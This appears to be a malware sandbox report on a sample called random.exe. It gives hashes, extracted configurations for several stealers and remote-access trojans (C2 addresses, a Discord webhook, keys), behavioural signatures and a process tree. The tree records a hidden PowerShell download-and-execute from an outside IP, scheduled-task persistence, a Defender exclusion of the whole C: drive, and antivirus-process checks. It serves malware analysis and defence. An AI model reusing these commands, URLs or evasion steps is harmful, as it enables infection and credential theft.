Overview

overview

10

Static

static

5

random.exe

windows7-x64

10

random.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 16:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    random.exe

  • Size

    938KB

  • MD5

    bcefbd57340b3f8c39699195c2946d69

  • SHA1

    73eb2f2c99d6a7141fc577d9375ae3992ac58b4a

  • SHA256

    8339734ef64625aea2605628510e071dccbb57941c2dd068c8b34fc859c4f2ec

  • SHA512

    a9cdc53ff3b7b5c6913353a70a268e88a61dd1a7b4ad9f2cf5657b28ff5b612cf8c20275e070c54a31acb83ea1608d273c2217e56415e1a8c0626c6b82681b9f

  • SSDEEP

    24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:9TvC/MTQYxsWR7a0J

Score
10/10
amadeyquasarskuldvidarxworm092155telegramagilenetcredential_accessdefense_evasiondiscoveryexecutionpersistenceratspywarestealerthemidatrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg
exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_LoEArEgGuZRG2bQs0E

Attributes
  • encryption_key

    yMvSAv7B2dURg67QYU5x

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Extracted

Family

skuld

C2

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

xworm

Version

5.0

C2

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 4 IoCs
    stealer
  • Detect Xworm Payload 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 5 IoCs
  • Skuld family
    skuld
  • Skuld stealer

    An info stealer written in Go lang.

    stealerskuld
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
    defense_evasion
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 13 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 48 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    defense_evasiontrojan
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 2 IoCs
    defense_evasion

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:3060
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4088
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
        PID:3548
        • C:\Users\Admin\AppData\Local\Temp\random.exe
          "C:\Users\Admin\AppData\Local\Temp\random.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn owzZGmaijU6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta" /sc minute /mo 25 /ru "Admin" /f
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5396
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn owzZGmaijU6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta" /sc minute /mo 25 /ru "Admin" /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2228
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta
            3⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5608
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3556
              • C:\Users\Admin\AppData\Local\Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE
                "C:\Users\Admin\AppData\Local\Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE"
                5⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3196
                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Downloads MZ/PE file
                  • Checks BIOS information in registry
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:6024
                  • C:\Users\Admin\AppData\Local\Temp\10301560101\f76de72994.exe
                    "C:\Users\Admin\AppData\Local\Temp\10301560101\f76de72994.exe"
                    7⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:3444
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                      8⤵
                      • Uses browser remote debugging
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:5200
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa94aedcf8,0x7ffa94aedd04,0x7ffa94aedd10
                        9⤵
                          PID:5252
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2132 /prefetch:3
                          9⤵
                            PID:5204
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2060,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2068 /prefetch:2
                            9⤵
                              PID:5080
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2532 /prefetch:8
                              9⤵
                                PID:1468
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3196 /prefetch:1
                                9⤵
                                • Uses browser remote debugging
                                PID:1728
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3228 /prefetch:1
                                9⤵
                                • Uses browser remote debugging
                                PID:5320
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4264 /prefetch:2
                                9⤵
                                • Uses browser remote debugging
                                PID:4144
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4680,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:1
                                9⤵
                                • Uses browser remote debugging
                                PID:3528
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5280 /prefetch:8
                                9⤵
                                  PID:3084
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5504,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5528 /prefetch:8
                                  9⤵
                                    PID:4780
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  8⤵
                                  • Uses browser remote debugging
                                  • Enumerates system info in registry
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  PID:876
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ffa848ef208,0x7ffa848ef214,0x7ffa848ef220
                                    9⤵
                                      PID:6096
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:3
                                      9⤵
                                        PID:5908
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2232,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:2
                                        9⤵
                                          PID:5808
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=2664 /prefetch:8
                                          9⤵
                                            PID:3044
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3516,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:4304
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:3600
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\aa1no" & exit
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3080
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 11
                                            9⤵
                                            • System Location Discovery: System Language Discovery
                                            • Delays execution with timeout.exe
                                            PID:5020
                                      • C:\Users\Admin\AppData\Local\Temp\10301570101\wjfOfXh.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301570101\wjfOfXh.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:5952
                                      • C:\Users\Admin\AppData\Local\Temp\10301580101\OkH8IPF.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301580101\OkH8IPF.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:1444
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4520
                                      • C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:2984
                                        • C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\windowscore.exe
                                          C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe
                                          8⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2256
                                      • C:\Users\Admin\AppData\Local\Temp\10301600101\ARxx7NW.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301600101\ARxx7NW.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:4668
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
                                          8⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2024
                                        • C:\Program Files\RuntimeApp\0000013728.exe
                                          "C:\Program Files\RuntimeApp\0000013728.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1984
                                      • C:\Users\Admin\AppData\Local\Temp\10301610101\tK0oYx3.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10301610101\tK0oYx3.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4104
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          8⤵
                                            PID:1068
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            8⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5732
                                        • C:\Users\Admin\AppData\Local\Temp\10301620101\d3jhg_003.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10301620101\d3jhg_003.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: MapViewOfSection
                                          PID:4968
                                          • C:\Windows\SYSTEM32\cmd.exe
                                            cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                            8⤵
                                              PID:2704
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                9⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3204
                                            • C:\Windows\system32\svchost.exe
                                              "C:\Windows\system32\svchost.exe"
                                              8⤵
                                              • Downloads MZ/PE file
                                              • Adds Run key to start application
                                              PID:5292
                                              • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                9⤵
                                                • Executes dropped EXE
                                                PID:6076
                                              • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                9⤵
                                                • Deletes itself
                                                • Executes dropped EXE
                                                PID:7064
                                          • C:\Users\Admin\AppData\Local\Temp\10301630101\4wAPcC0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301630101\4wAPcC0.exe"
                                            7⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3212
                                            • C:\Users\Admin\AppData\Roaming\media\svchost.exe
                                              "C:\Users\Admin\AppData\Roaming\media\svchost.exe"
                                              8⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of SetWindowsHookEx
                                              PID:2172
                                          • C:\Users\Admin\AppData\Local\Temp\10301640101\zx4PJh6.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301640101\zx4PJh6.exe"
                                            7⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            PID:6184
                                            • C:\Windows\SysWOW64\CMD.exe
                                              "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:6140
                                              • C:\Windows\SysWOW64\tasklist.exe
                                                tasklist
                                                9⤵
                                                • Enumerates processes with tasklist
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2088
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr /I "opssvc wrsa"
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:10340
                                              • C:\Windows\SysWOW64\tasklist.exe
                                                tasklist
                                                9⤵
                                                • Enumerates processes with tasklist
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5424
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4876
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c md 440824
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3680
                                              • C:\Windows\SysWOW64\extrac32.exe
                                                extrac32 /Y /E Architecture.wmv
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4384
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr /V "Offensive" Inter
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:8780
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:8864
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:10556
                                              • C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
                                                Organizations.com h
                                                9⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
